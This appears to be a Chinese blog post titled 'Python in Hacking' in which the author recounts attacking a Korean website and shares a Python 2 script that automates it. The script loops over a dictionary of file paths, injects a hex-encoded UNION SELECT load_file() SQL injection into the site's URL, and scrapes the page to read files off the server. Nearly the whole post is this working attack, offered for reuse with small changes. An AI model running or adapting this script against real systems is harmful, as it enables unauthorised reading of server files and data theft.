Python in Hacking[LO
Pnig0s p.s: ***一韩国站,遭遇Mysql4,好在有FILE权限只能批量LOAD_FILE路径,为了避免繁重的工作量写了这个脚本,字典文件名为dic.txt路径一行一个,因为环境不同,此脚本并非通用,稍作改动即可。复制代码请务必在普通IE下复制
- #!/usr/bin/python
- # -*- coding:utf-8 -*-
- ########################################
- # Coder:Pnig0s1992
- # A script to auto use the LOAD_FILE()
- # GTalk:pniGos70@gmail.com
- #Blog:Http://pnig0s1992.blog.51cto.com/
- #
- ########################################
- import urllib
- import binascii
- import string
- import os
- def guessPath():
- fi = open('dic.txt','r+')
- while True:
- path = fi.readline().strip()
- if path:
- url = 'http://www.xxx.co.kr/?mode=view&no=\
- 1151 AnD 1=2 UNIOn SeleCt 1,2,3,4,5,load_file(0x'+binascii.b2a_hex(str(path))+')'
- EnUrl=urllib.quote_plus(url,safe=':\'/?&=()|')
- fd = urllib.urlopen(EnUrl)
- res = fd.read()
- Begin = res.rfind('<table width="450" border="0" cellspacing="0" cellpadding="0">')
- End = res.rfind('<table width="486" border="0" cellspacing="0" cellpadding="0">')
- tempDate = res[Begin:End]
- realBegin = tempDate.index('<td>')+4
- realEnd = tempDate.index('</td>')
- checkEmpty = tempDate[realBegin:realEnd].strip()
- if checkEmpty:
- print path+' is exists!!!!!!!!!!!'
- print 'Geting the data......'
- print checkEmpty
- os.system('pause')
- else:
- print path+' is not exists.'
- continue
- else:
- print 'All has finished...'
- break
-
- if __name__ == '__main__':
- print '__________Written by Pnig0s1992__________'
- guessPath()
相关文章